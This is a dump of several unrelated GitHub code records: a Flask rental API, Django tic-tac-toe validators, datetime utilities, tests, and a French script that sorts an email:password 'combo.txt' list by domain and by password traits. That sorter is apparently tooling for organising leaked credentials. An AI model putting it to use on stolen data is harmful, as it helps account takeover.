#SubStream\n#enc.disable_osd_image(1)\n#enc.enable_osd_image(1,15,15,64)\n","repo_name":"m0dts/HDMI-Encoder-Tools","sub_path":"encoder_test.py","file_name":"encoder_test.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"69800404650","text":"# coding:utf-\nfrom flask import current_app, jsonify, json, g, request, session\n\nfrom ihome import redis_store, constants, db\nfrom ihome.models import Area, User, Facility, House, HouseImage\nfrom ihome.utils.commons import login_required\nfrom ihome.utils.image_storage import storage\nfrom ihome.utils.response_code import RET\nfrom . 
import api\n\n\n@api.route(\"/areas\")\ndef get_area_info():\n    \"\"\"Get the city area info.\"\"\"\n    # try the redis cache first\n    try:\n        areas_json = redis_store.get(\"area_info\")\n    except Exception as e:\n        current_app.logger.error(e)\n        areas_json = None\n    if areas_json is None:\n        # query the database for the area info\n        try:\n            areas_list = Area.query.all()\n        except Exception as e:\n            current_app.logger.error(e)\n            return jsonify(errno=RET.DBERR, errmsg=\"查询城区信息异常\")\n\n        areas = []\n        for area in areas_list:\n            areas.append(area.to_dict())\n\n        # keep a copy of the data in redis\n        # 1. convert the data to json\n        area_json = json.dumps(areas)\n\n        # 2. store the data in redis\n        try:\n            redis_store.setex(\"area_info\", constants.AREA_INFO_REDIS_EXPIRES, area_json)\n        except Exception as e:\n            current_app.logger.error(e)\n    else:\n        # redis has a cached copy, so the cached data is used directly\n        current_app.logger.info(\"hit redis area info\")\n    # areas_json is either the json fetched from redis or the json built from the database query\n    # areas_json = '[{\"aid\":xx, \"aname\":xxx}, {},{}]'\n\n    return '{\"errno\": 0, \"errmsg\": \"查询城区信息成功\", \"data\":{\"areas\": %s}}' % areas_json, 200, \\\n           {\"Content-Type\": \"application/json\"}\n\n\n@api.route(\"/user/houses\", methods=[\"GET\"])\n@login_required\ndef get_user_houses():\n    \"\"\"Get the house listings published by the landlord.\"\"\"\n    user_id = g.user_id\n\n    try:\n        user = User.query.get(user_id)\n        houses = user.houses\n\n        # houses = House.query.filter_by(user_id=user_id)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg=\"获取数据失败\")\n\n    # convert the queried houses to dicts and store them in a list\n    houses_list = []\n    if houses:\n        for house in houses:\n            houses_list.append(house.to_basic_dict())\n    return jsonify(errno=RET.OK, errmsg=\"OK\", data={\"houses\": houses_list})\n\n\n@api.route(\"/houses/info\", methods=[\"POST\"])\n@login_required\ndef sava_house_info():\n    \"\"\"Save the basic house info sent by the front end as json.\"\"\"\n    # request data\n    house_data = request.get_json()\n    if house_data is None:\n        return jsonify(errno=RET.PARAMERR, errmsg=\"参数错误\")\n\n    title = house_data.get(\"title\")  # house title\n    price = house_data.get(\"price\")  # house price\n    area_id = house_data.get(\"area_id\")  # id of the area the house belongs to\n    address = house_data.get(\"address\")  # house address\n    room_count = house_data.get(\"room_count\")  # number of rooms in the house\n    acreage = house_data.get(\"acreage\")  # house area\n    unit = house_data.get(\"unit\")  # room layout (bedrooms/living rooms)\n    capacity = house_data.get(\"capacity\")  # number of people the house can hold\n    beds = house_data.get(\"beds\")  # number of beds\n    deposit = house_data.get(\"deposit\")  # deposit\n    min_days = house_data.get(\"min_days\")  # minimum stay in days\n    max_days = house_data.get(\"max_days\")  # maximum stay in days\n\n    # validate the parameters\n    if not all(\n            [title, price, area_id, address, room_count, acreage, unit, capacity, beds, deposit, min_days, max_days]):\n        return jsonify(errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n    try:\n        price = int(float(price) * 100)\n        deposit = int(float(deposit) * 100)\n    except Exception as e:\n        return jsonify(errno=RET.DBERR, errmsg=\"参数有误\")\n\n    # save the info\n    user_id = g.user_id\n    house = House(\n        user_id=user_id,\n        area_id=area_id,\n        title=title,\n        price=price,\n        address=address,\n        room_count=room_count,\n        acreage=acreage,\n        unit=unit,\n        capacity=capacity,\n        beds=beds,\n        deposit=deposit,\n        min_days=min_days,\n        max_days=max_days\n    )\n    # handle the house facility info\n    facility_id_list = house_data.get(\"facility\")\n    if facility_id_list:\n        # the user ticked some facilities\n        # filter out invalid facility ids sent by the user\n        # select * from facility where id in (facility_id_list)\n        try:\n            facility_list = Facility.query.filter(Facility.id.in_(facility_id_list)).all()\n        except Exception as e:\n            current_app.logger.error(e)\n            return jsonify(errno=RET.DBERR, errmsg=\"数据库异常\")\n\n        # attach the facilities to the house\n        if facility_list:\n            house.facilities = facility_list\n\n    try:\n        db.session.add(house)\n        db.session.commit()\n    except Exception as e:\n        current_app.logger.error(e)\n        db.session.rollback()\n        return jsonify(errno=RET.DBERR, errmsg=\"保存数据失败\")\n\n    # respond\n    return jsonify(errno=RET.OK, errmsg=\"保存成功\", data={\"house_id\": house.id})\n\n\n@api.route(\"/houses/image\", methods=[\"POST\"])\n@login_required\ndef save_house_image():\n    \"\"\"Save a house image.\"\"\"\n    # parameters: the house image and the house id\n    house_id = request.form.get(\"house_id\")\n    image_file = request.files.get(\"house_image\")\n\n    # validate the parameters\n    if not all([house_id, image_file]):\n        return jsonify(errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n    # check that the house exists\n    try:\n        house = House.query.get(house_id)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg=\"数据库异常\")\n\n    if house is None:\n        return jsonify(errno=RET.NODATA, errmsg=\"房屋不存在\")\n\n    # upload the house image to Qiniu\n    image_data = image_file.read()\n    try:\n        file_name = storage(image_data)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.THIRDERR, errmsg=\"保存房屋图片失败\")\n\n    # save the image info to the database\n    house_image = HouseImage(\n        house_id=house_id,\n        url=file_name\n    )\n    db.session.add(house_image)\n\n    # handle the main image in the basic house info\n    if not house.index_image_url:\n        house.index_image_url = file_name\n        db.session.add(house)\n\n    try:\n        db.session.commit()\n    except Exception as e:\n        current_app.logger.error(e)\n        db.session.rollback()\n        return jsonify(errno=RET.DBERR, errmsg=\"保存图片信息失败\")\n\n    image_url = constants.QINIU_URL_DOMAIN + file_name\n    return jsonify(errno=RET.OK, errmsg=\"保存图片成功\", data={\"image_url\": image_url})\n\n\n@api.route(\"/houses/index\", methods=[\"GET\"])\ndef get_houses_index():\n    \"\"\"Get the basic info of the houses shown in the home page carousel.\"\"\"\n    # try to get the data from the cache first\n    try:\n        ret = redis_store.get(\"home_page_data\")\n    except Exception as e:\n        current_app.logger.error(e)\n        ret = None\n    if ret:\n        current_app.logger.info(\"hit house index info redis\")\n        # redis stores a json string, so just splice it into the response\n        return '{\"errno\":0, \"errmsg\":\"OK\",\"data\":%s}' % ret, 200, {\"Content-Type\": \"application/json\"}\n    else:\n        try:\n            # query the database for the five houses with the most orders\n            houses = House.query.order_by(House.order_count.desc()).limit(constants.HOME_PAGE_MAX_HOUSES)\n        except Exception as e:\n            current_app.logger.error(e)\n            return jsonify(errno=RET.DBERR, errmsg=\"查询数据库失败\")\n        if not houses:\n            return jsonify(errno=RET.NODATA, errmsg=\"查询无数据\")\n\n        houses_list = []\n        for house in houses:\n            # skip houses with no image set\n            if not house.index_image_url:\n                continue\n            houses_list.append(house.to_basic_dict)\n        # convert the data to json and keep it in the redis cache\n        json_houses = json.dumps(houses_list)\n        try:\n            redis_store.setex(\"home_page_data\", constants.HOME_PAGE_DATA_REDIS_EXPIRES, json_houses)\n        except Exception as e:\n            current_app.logger.error(e)\n        return '{\"errno\":0, \"errmsg\":\"ok\", \"data\":%s}' % json_houses, 200, {\"Content-Type\": \"application/json\"}\n\n\n@api.route(\"/houses/<int:house_id>\", methods=[\"GET\"])\ndef get_house_detail(house_id):\n    \"\"\"Get the house details.\"\"\"\n    # on the house detail page the front end shows the booking button only when the viewer\n    # is not the landlord of this house, so the back end needs to return the logged-in user's user_id\n    # try to get the login info: if logged in, return the user's user_id to the front end, otherwise return user_id=-1\n    user_id = session.get(\"user_id\", \"-1\")\n\n    # validate the parameters\n    if not house_id:\n        return jsonify(errno=RET.PARAMERR, errmsg=\"参数缺失\")\n\n    # try the redis cache first\n    try:\n        ret = redis_store.get(\"house_info_%s\" % house_id)\n    except Exception as e:\n        current_app.logger.error(e)\n        ret = None\n    if ret:\n        current_app.logger.info(\"hit house info redis\")\n        return '{\"errno\":\"0\", \"errmsg\":\"OK\", \"data\":{\"user_id\":%s, \"house\":%s}}' % (user_id, ret), 200, {\n            \"Content-Type\": \"application/json\"}\n\n    # query the database\n    try:\n        house = House.query.get(house_id)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg=\"查询数据失败\")\n\n    if not house:\n        return jsonify(errno=RET.NODATA, errmsg=\"房屋不存在\")\n\n    # convert the house object to a dict\n    try:\n        house_data = house.to_full_dict()\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DATAERR, errmsg=\"数据出错\")\n\n    # store it in redis\n    json_house = json.dumps(house_data)\n    try:\n        redis_store.setex(\"house_info_%s\" % house_id, constants.HOUSE_DETAIL_REDIS_EXPIRE_SECOND, json_house)\n    except Exception as e:\n        current_app.logger.error(e)\n\n    resp = '{\"errno\":\"0\", \"errmsg\":\"OK\", \"data\":{\"user_id\":%s, \"house\":%s}}' % (user_id, json_house), 200, {\n        \"Content-Type\": \"application/json\"}\n    return resp\n","repo_name":"TingFengwj/ihome","sub_path":"ihome/api_1_0/houses.py","file_name":"houses.py","file_ext":"py","file_size_in_byte":12408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33833201901","text":"from Model.modul import *\r\nfrom Model.domaine import *\r\nimport string\r\n\r\n\r\ndef verif(directory):\r\n    if os.path.exists(directory):\r\n        pass\r\n    else:\r\n        print(\"Le fichier '{}' est introuvable !\".format(directory))\r\n        quit()\r\n\r\n\r\n# helper functions that wrap the Domaine commands from the Model package\r\ndef _create_txt(x):\r\n    return Domaine.create_txt(x.get_search(), x.get_name(), combo_list)\r\n\r\n\r\ndef _create_txt_not(x):\r\n    return Domaine.create_txt_not(x.get_search(), x.get_name(), combo_list)\r\n\r\n\r\ndef _create_txt_mdp(x):\r\n    return Domaine.create_txt_mdp(x.get_search(), x.get_name(), combo_list)\r\n\r\n\r\ndef _create_txt_mdp_search(x):\r\n    return Domaine.create_txt_mdp_search(x.get_search(), x.get_name(), combo_list)\r\n\r\n\r\n# function to start: if the answer is yes the script starts, otherwise it does not\r\n# checks that the answer is not different from 'Non', otherwise the function starts over\r\ndef start(txt):\r\n    global start_sorte\r\n    start_sorte = str(input(\"{} (Oui/Non)\".format(txt)))\r\n    if start_sorte == \"Oui\":\r\n        start_sorte = True\r\n    else:\r\n        if start_sorte != \"Non\":\r\n            print(\"Je ne vous ai pas compris .\")\r\n            return start(txt)\r\n        else:\r\n            start_sorte = False\r\n\r\n\r\n# function to check that the user really typed one of the two possible answers (Oui/Non)\r\ndef condition(txt):\r\n    global start_sorte\r\n    add_domains_input = str(input(\"{} (Oui/Non)\".format(txt)))\r\n    if add_domains_input == \"Non\":\r\n        start_sorte = False\r\n    else:\r\n        if add_domains_input != \"Oui\":\r\n            print(\"Je ne vous ai pas compris .\")\r\n            return condition(txt)\r\n        start_sorte = True\r\n\r\n\r\n# checks that the files required by the code are present, otherwise closes the program\r\nverif(\"Model/domaine.py\")\r\nverif(\"Model/modul.py\")\r\nverif(\"Combo\")\r\nverif(\"Mdp\")\r\n\r\n# checks whether the file \"combo.txt\" exists; if so reads it, otherwise print(..)\r\nif os.path.exists(\"combo.txt\"):\r\n    with open(\"combo.txt\", \"r+\") as file:\r\n        combo_list = file.readlines()\r\n        file.close()\r\nelse:\r\n    print(\"Le fichier 'combo.txt' est introuvable !\")\r\n    add_combo(\"Voulez-vous ajouter le fichier 'combo.txt ?\")\r\n\r\n# sort the combo_list from A -> Z\r\ncombo_list.sort()\r\n\r\n# number of elements in the combo_list\r\nnum_lines_combo_list = len(combo_list)\r\nprint(\"Tu as mis une combo de\", num_lines_combo_list)\r\n\r\n# run the del_dupli function, which checks whether two entries are identical and removes them\r\ncombo_list = del_dupli(combo_list)\r\n\r\n# number of elements in the combo_list\r\nnum_lines_combo_dup_list = len(combo_list)\r\nprint(\"On a supprimé\", num_lines_combo_list - num_lines_combo_dup_list, \"duplication !\")\r\n\r\n# function to create a txt file without duplicates\r\n# create_txt_dupli(combo_list)\r\n\r\n# function to start adding a new search\r\nstart(\"Voulez-vous ajoutez une nouvelle recherche ?\")\r\n\r\n# repeats as long as 'start_sorte' is 'True'\r\nwhile start_sorte:\r\n    #\r\n    add_domaine_input = input(\"Veuiller entrer la recherche , et le nom ex:(.com: COM)\").split(\" \")\r\n\r\n    add_domaine = Domaine(add_domaine_input[0], add_domaine_input[1], combo_list)\r\n\r\n    _create_txt(add_domaine)\r\n\r\n    condition(\"Voulez-vous ajoutez une nouvelle recherche ?\")\r\n\r\n# function to start adding a new search based on the passwords\r\nstart(\"Voulez-vous ajoutez une nouvelle recherche en fonction du mot de passe ?\")\r\n\r\n# repeats as long as 'start_sorte' is 'True'\r\nwhile start_sorte:\r\n    add_domaine_input = input(\"Veuiller entrer la recherche , et le nom ex:(pass Pass)\").split(\" \")\r\n\r\n    add_domaine = Domaine(add_domaine_input[0], add_domaine_input[1], combo_list)\r\n\r\n    _create_txt_mdp_search(add_domaine)\r\n\r\n    condition(\"Voulez-vous ajoutez une nouvelle recherche ?\")\r\n\r\n# function to start using the default sorting searches\r\nstart(\"Voulez-vous utilisé les recherches de tries par défault ?\")\r\n\r\n# repeats as long as 'start_sorte' is 'True'\r\nwhile start_sorte:\r\n\r\n    # default domains\r\n    fr = Domaine(\".fr:\", \"FR\", combo_list)\r\n    com = Domaine(\".com:\", \"COM\", combo_list)\r\n    net = Domaine(\".net:\", \"NET\", combo_list)\r\n    user = Domaine(\"@\", \"user\", combo_list)\r\n\r\n    # helper around create_txt: checks whether the txt file exists, searches combo_list for the\r\n    # query, and finally checks whether the txt lines are filled and prints the result\r\n    _create_txt(fr)\r\n\r\n    _create_txt(com)\r\n\r\n    _create_txt(net)\r\n\r\n    _create_txt_not(user)\r\n\r\n    condition(\"Voulez-vous le reste ?\")\r\n\r\n    if start_sorte is True:\r\n        # to be simplified\r\n        if os.path.exists(divers):\r\n            os.remove(divers)\r\n        for combo in combo_list:\r\n            # for num in range(0 , len(all_search)): = from 0 to 3, to be developed to make this automatic\r\n            if fr.get_search() not in combo:\r\n                if com.get_search() not in combo:\r\n                    if net.get_search() not in combo:\r\n                        if user.get_search() in combo:\r\n                            with open(divers, \"a+\") as file:\r\n                                file.write(combo)\r\n                                file.close()\r\n        # function that checks whether the txt lines are filled and prints the result\r\n        exist(divers)\r\n\r\n    # set the variable 'start_sorte' to 'False'\r\n    start_sorte = False\r\n\r\n# function to launch the password sorting\r\nstart(\"Voulez-vous utilisé les recherches de tries en fonction des mots de passes par défault ?\")\r\n\r\nupper_punct = (string.ascii_uppercase + string.punctuation)\r\n\r\n# repeats as long as 'start_sorte' is 'True'\r\nwhile start_sorte:\r\n    upper = Domaine(string.ascii_uppercase, \"uppercase\", combo_list)\r\n    punct = Domaine(string.punctuation, \"punctuation\", combo_list)\r\n\r\n    _create_txt_mdp(upper)\r\n    _create_txt_mdp(punct)\r\n\r\n    time.sleep(10)\r\n    start_sorte = False\r\n\r\n\r\n","repo_name":"Toxi91/Trieur","sub_path":"Sorter.py","file_name":"Sorter.py","file_ext":"py","file_size_in_byte":5933,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23655172637","text":"\"\"\"all input validations go here\"\"\"\n\nfrom django.core.exceptions import ValidationError\n\nimport re\n\nfrom tictactoe_project.settings import X_CHAR, O_CHAR, EMPTY_CHAR,\\\n    BOARD_LENGTH\n\nDEFAULT_BOARD_VALUE = EMPTY_CHAR * BOARD_LENGTH\n\n\ndef validate_board_chars(value):\n    \"\"\"\n    make sure board length is BOARD_LENGTH and contains only\n    chars in [X_CHAR, O_CHAR, EMPTY_CHAR]\n    \"\"\"\n\n    # no commas inside the character class, and the literal braces of the\n    # quantifier must be doubled inside an f-string\n    reg_to_match = fr'[{X_CHAR}{O_CHAR}{EMPTY_CHAR}]{{{BOARD_LENGTH}}}$'\n    reg = re.compile(reg_to_match)\n    is_match = reg.match(value)\n    if not is_match:\n        error_msg = f\"board must be of length {BOARD_LENGTH} and accepts only characters in {[X_CHAR, O_CHAR, EMPTY_CHAR]}\"\n        raise ValidationError(error_msg)\n    return value\n\n\ndef validate_new_move(old_board, new_board, current_player):\n    \"\"\"check if player played his correct role and made only one move\"\"\"\n    moves_count = 0\n    for x in range(BOARD_LENGTH):\n        if old_board[x] == new_board[x]:\n            # if both board cells are equal then\n            # we don't need to check anything, no changes there\n            continue\n        is_assigning_to_already_selected = old_board[x] != EMPTY_CHAR\n        if is_assigning_to_already_selected:\n            raise ValidationError(\n                f\"cannot change cell number {x+1}, it has been already selected!\")\n        played_other_role = new_board[x] != current_player\n        if played_other_role:\n            raise ValidationError(f\"You must play using {current_player} sign\")\n        moves_count += 1\n    if moves_count > 1:\n        raise ValidationError(\"You can play only one move!\")\n","repo_name":"hocinekhen/tictactoe","sub_path":"tictactoe-backend/tictactoe_app/helpers/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30724282859","text":"from datetime import datetime, date, timedelta, timezone\nimport 
dateparser\nfrom typing import Union, Tuple, Optional\n\nimport discord\n\nfrom kaztron.config import get_kaztron_config\n\n\nDATEPARSER_SETTINGS = {\n 'TIMEZONE': 'UTC',\n 'TO_TIMEZONE': 'UTC',\n 'RETURN_AS_TIMEZONE_AWARE': False\n}\n\n\ndef parse(timespec: str, future=False, **kwargs) -> Optional[datetime]:\n \"\"\"\n Datetime parser, using the `dateparse` package. By default, assumes the UTC timezone unless the\n datetime string specifies timezone.\n\n :param timespec: String to parse\n :param future: If True, ambiguous dates should favour future times. Otherwise, past.\n :param kwargs: Any other kwargs to pass to dateparser.parse\n :return: A timezone-agnostic datetime object in UTC.\n \"\"\"\n settings = DATEPARSER_SETTINGS.copy()\n settings.update(kwargs)\n if not future:\n return dateparser.parse(timespec, settings=settings)\n else:\n # workaround for https://github.com/scrapinghub/dateparser/issues/403\n # we'll try it out without this setting and return if it's in the future\n dt = dateparser.parse(timespec, settings=settings)\n if dt is None: # not parsable\n return dt\n elif dt > datetime.utcnow():\n return dt\n else:\n settings['PREFER_DATES_FROM'] = 'future'\n return dateparser.parse(timespec, settings=settings)\n\n\ndef utctimestamp(utcdt: datetime):\n return utcdt.replace(tzinfo=timezone.utc).timestamp()\n \n\ndef truncate(dt: datetime, timespec='minute'):\n \"\"\"\n Truncate a datetime to the resolution given by 'timespec'.\n\n :param dt: The datetime to round.\n :param timespec: One of \"month\", \"day\", \"hour\", \"minute\", \"second\" - the level of resolution\n to round to.\n :raise ValueError: invalid timespec parameter\n \"\"\"\n if timespec == 'month':\n dt_replace_params = {'day': 1, 'hour': 0, 'minute': 0, 'second': 0, 'microsecond': 0}\n elif timespec == 'day':\n dt_replace_params = {'hour': 0, 'minute': 0, 'second': 0, 'microsecond': 0}\n elif timespec == 'hour':\n dt_replace_params = {'minute': 0, 'second': 0, 'microsecond': 0}\n elif timespec == 'minute':\n dt_replace_params = {'second': 0, 'microsecond': 0}\n elif timespec == 'second':\n dt_replace_params = {'microsecond': 0}\n else:\n raise ValueError(\"invalid timespec {!r}\".format(timespec))\n\n try:\n return dt.replace(**dt_replace_params)\n except AttributeError as e:\n raise ValueError(\"invalid dt parameter {!r}\".format(dt)) from e\n\n\ndef format_datetime(dt: datetime, seconds=False) -> str:\n \"\"\"\n Format a datetime object as a datetime (as specified in config).\n :param dt: The datetime object to format.\n :param seconds: Whether or not to display seconds (this determines which config format to use).\n :return:\n \"\"\"\n format_key = 'datetime_format' if not seconds else 'datetime_seconds_format'\n return dt.strftime(get_kaztron_config().get('core', format_key))\n\n\ndef format_date(d: Union[datetime, date]) -> str:\n \"\"\"\n Format a datetime object as a date (as specified in config).\n\n :param d: The date or datetime object to format.\n :return:\n \"\"\"\n return d.strftime(get_kaztron_config().get('core', 'date_format'))\n\n\ndef format_timedelta(delta: timedelta, timespec=\"seconds\") -> str:\n \"\"\"\n Format a timedelta object into \"x days y hours\" etc. format.\n\n This is ugly. 
Sorry.\n\n :param delta: The delta to format.\n :param timespec: One of \"days\", \"hours\", \"minutes\", \"seconds\", \"microseconds\" - the level of\n resolution to show.\n :return:\n \"\"\"\n str_parts = []\n\n timespec_list = ['days', 'hours', 'minutes', 'seconds', 'microseconds']\n try:\n timespec_prio = timespec_list.index(timespec)\n\n # get a resolution object to round against\n if timespec == 'days':\n res = timedelta(days=1)\n elif timespec == 'hours':\n res = timedelta(hours=1)\n elif timespec == 'minutes':\n res = timedelta(minutes=1)\n elif timespec == 'seconds':\n res = timedelta(seconds=1)\n elif timespec == 'microseconds':\n res = None\n except ValueError:\n raise ValueError(\"Invalid timespec {!r}\".format(timespec)) from None\n\n # round\n if res:\n delta = (delta + res/2) // res * res\n\n # split up seconds into hours, minutes, seconds\n # (because timedelta only stores days and seconds???)\n rem = timedelta(seconds=delta.seconds, microseconds=delta.microseconds)\n # noinspection PyTypeChecker\n hours, rem = divmod(rem, timedelta(hours=1))\n # noinspection PyTypeChecker\n minutes, rem = divmod(rem, timedelta(minutes=1))\n # noinspection PyTypeChecker\n seconds, rem = divmod(rem, timedelta(seconds=1))\n\n if delta.days:\n str_parts.append(\"{:d} day{}\".format(delta.days, 's' if abs(delta.days) != 1 else ''))\n if hours and timespec_prio >= timespec_list.index('hours'):\n str_parts.append(\"{:d} hour{}\".format(hours, 's' if abs(hours) != 1 else ''))\n if minutes and timespec_prio >= timespec_list.index('minutes'):\n str_parts.append(\"{:d} minute{}\".format(minutes, 's' if abs(minutes) != 1 else ''))\n if (seconds or delta.microseconds) and timespec_prio >= timespec_list.index('microseconds'):\n f_seconds = seconds + delta.microseconds/1e6\n str_parts.append(\"{:.6f} second{}\".format(f_seconds, 's' if f_seconds != 1.0 else ''))\n elif seconds and timespec_prio >= timespec_list.index('seconds'):\n str_parts.append(\"{:d} second{}\".format(seconds, 's' if seconds != 1 else ''))\n\n if not str_parts:\n if timespec == 'microseconds':\n timespec = 'seconds'\n str_parts.append(\"0 {}\".format(timespec))\n\n return ' '.join(str_parts)\n\n\ndef format_timestamp(dt: Union[discord.Message, datetime]) -> str:\n \"\"\" Get the timestamp string of a message to second precision, with 'UTC' timezone string. \"\"\"\n if isinstance(dt, discord.Message):\n dt = dt.timestamp\n return format_datetime(dt, seconds=True) + ' UTC'\n\n\ndef get_month_offset(dt_month: datetime, months: int) -> datetime:\n \"\"\"\n Add or subtract months from a month datetime. Always returns the 1st of the month at midnight.\n :param dt_month:\n :param months: Number of months to add (>0) or subtract (<0).\n :return:\n \"\"\"\n offset = abs(months)\n if months > 0:\n delta = timedelta(days=32)\n else:\n delta = timedelta(days=-1)\n\n new_dt = truncate(dt_month, 'month')\n for _ in range(offset):\n new_dt = truncate(new_dt + delta, 'month')\n return new_dt\n\n\ndef get_weekday(dt: datetime, weekday: int, future=True) -> datetime:\n \"\"\"\n Get the nearest date corresponding to a weekday before or after the reference date. The time\n of ``dt`` is NOT considered when calculating past/future, only the date.\n\n The returned datetime will have the same time-of-day as ``dt``.\n :param dt: The reference date.\n :param weekday: The weekday to find (0 = Sunday, 6 = Saturday).\n :param future: If True, find the nearest date in the future (including today). 
Otherwise, find\n the nearest date in the past.\n \"\"\"\n if not 0 <= weekday < 7:\n raise ValueError(\"0 <= weekday < 7, got {}\".format(weekday))\n\n dt_future = dt + timedelta(days=(weekday - dt.weekday() + 7) % 7)\n\n if future:\n return dt_future\n else:\n return dt_future - timedelta(days=7)\n\n\ndef parse_daterange(daterange: str, future=False) -> Tuple[datetime, datetime]:\n \"\"\"\n Process and parse a date or daterange, in the form of \"X to Y\".\n \"\"\"\n date_split = daterange.split(' to ', maxsplit=1)\n\n dates = tuple(parse(date_str, future=future) for date_str in date_split)\n if None in dates:\n raise ValueError(\"Invalid date format(s): {!r} processed as {!r}\".format(daterange, dates))\n\n # if only one\n if len(dates) == 1:\n dates = (dates[0], dates[0] + timedelta(days=1))\n\n # if the order is wrong, swap\n if dates[0] > dates[1]:\n dates = (dates[1], dates[0])\n\n return dates\n","repo_name":"Worldbuilding/kaztron","sub_path":"kaztron/utils/datetime.py","file_name":"datetime.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"19175636732","text":"import tempfile\nimport shutil\nimport os\nfrom lbry.testcase import AsyncioTestCase\nfrom lbry.conf import Config\nfrom lbry.extras.daemon.storage import SQLiteStorage\nfrom lbry.blob.blob_manager import BlobManager\n\n\nclass TestBlobManager(AsyncioTestCase):\n async def setup_blob_manager(self, save_blobs=True):\n tmp_dir = tempfile.mkdtemp()\n self.addCleanup(lambda: shutil.rmtree(tmp_dir))\n self.config = Config(save_blobs=save_blobs)\n self.storage = SQLiteStorage(self.config, os.path.join(tmp_dir, \"lbrynet.sqlite\"))\n self.blob_manager = BlobManager(self.loop, tmp_dir, self.storage, self.config)\n await self.storage.open()\n\n async def test_memory_blobs_arent_verified_but_real_ones_are(self):\n for save_blobs in (False, True):\n await self.setup_blob_manager(save_blobs=save_blobs)\n # add a blob file\n blob_hash = \"7f5ab2def99f0ddd008da71db3a3772135f4002b19b7605840ed1034c8955431bd7079549e65e6b2a3b9c17c773073ed\"\n blob_bytes = b'1' * ((2 * 2 ** 20) - 1)\n blob = self.blob_manager.get_blob(blob_hash, len(blob_bytes))\n blob.save_verified_blob(blob_bytes)\n await blob.verified.wait()\n self.assertTrue(blob.get_is_verified())\n self.blob_manager.blob_completed(blob)\n self.assertEqual(self.blob_manager.is_blob_verified(blob_hash), save_blobs)\n\n async def test_sync_blob_file_manager_on_startup(self):\n await self.setup_blob_manager(save_blobs=True)\n\n # add a blob file\n blob_hash = \"7f5ab2def99f0ddd008da71db3a3772135f4002b19b7605840ed1034c8955431bd7079549e65e6b2a3b9c17c773073ed\"\n blob_bytes = b'1' * ((2 * 2 ** 20) - 1)\n with open(os.path.join(self.blob_manager.blob_dir, blob_hash), 'wb') as f:\n f.write(blob_bytes)\n\n # it should not have been added automatically on startup\n\n await self.blob_manager.setup()\n self.assertSetEqual(self.blob_manager.completed_blob_hashes, set())\n\n # make sure we can add the blob\n await self.blob_manager.blob_completed(self.blob_manager.get_blob(blob_hash, len(blob_bytes)))\n self.assertSetEqual(self.blob_manager.completed_blob_hashes, {blob_hash})\n\n # stop the blob manager and restart it, make sure the blob is there\n self.blob_manager.stop()\n self.assertSetEqual(self.blob_manager.completed_blob_hashes, set())\n await self.blob_manager.setup()\n self.assertSetEqual(self.blob_manager.completed_blob_hashes, {blob_hash})\n\n # test that the blob is removed upon the next 
startup after the file being manually deleted\n        self.blob_manager.stop()\n\n        # manually delete the blob file and restart the blob manager\n        os.remove(os.path.join(self.blob_manager.blob_dir, blob_hash))\n        await self.blob_manager.setup()\n        self.assertSetEqual(self.blob_manager.completed_blob_hashes, set())\n\n        # check that the deleted blob was updated in the database\n        self.assertEqual(\n            'pending', (\n                await self.storage.run_and_return_one_or_none('select status from blob where blob_hash=?', blob_hash)\n            )\n        )\n","repo_name":"lbryio/lbry-sdk","sub_path":"tests/unit/blob/test_blob_manager.py","file_name":"test_blob_manager.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":7218,"dataset":"github-code","pt":"53"}
+{"seq_id":"8543371384","text":"from read import Read\n\nlst = []\ndict = {}\n\nwhile True:\n\tkey = Read(str, 'Key')\n\tif key.lower() == 'done':\n\t\tbreak\n\tvalue = Read(str, 'Value(s)').split()\n\tlst.append((key, value))\n\nprint(lst)\n\nfor i, j in lst:\n\tdict[i] = j\n\nprint(dict)\n","repo_name":"N-eeraj/perfect_plan_b","sub_path":"tuple-list.py","file_name":"tuple-list.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"25483536088","text":"import unittest\n\nfrom lost_hat_smoke_tests import LostHatSmokeTests\nfrom unittest.loader import makeSuite\n\n\ndef smoke_suite():\n    test_suite = unittest.TestSuite()\n    # adding test classes:\n    test_suite.addTest(makeSuite(LostHatSmokeTests))  # all tests from this class\n    return test_suite\n\n\nrunner = unittest.TextTestRunner(verbosity=2)\nsuit = smoke_suite()\nrunner.run(suit)\n\n\n\n\n\n","repo_name":"sympo/jaktestowacDemoTest","sub_path":"testsuite_smoke_tests.py","file_name":"testsuite_smoke_tests.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
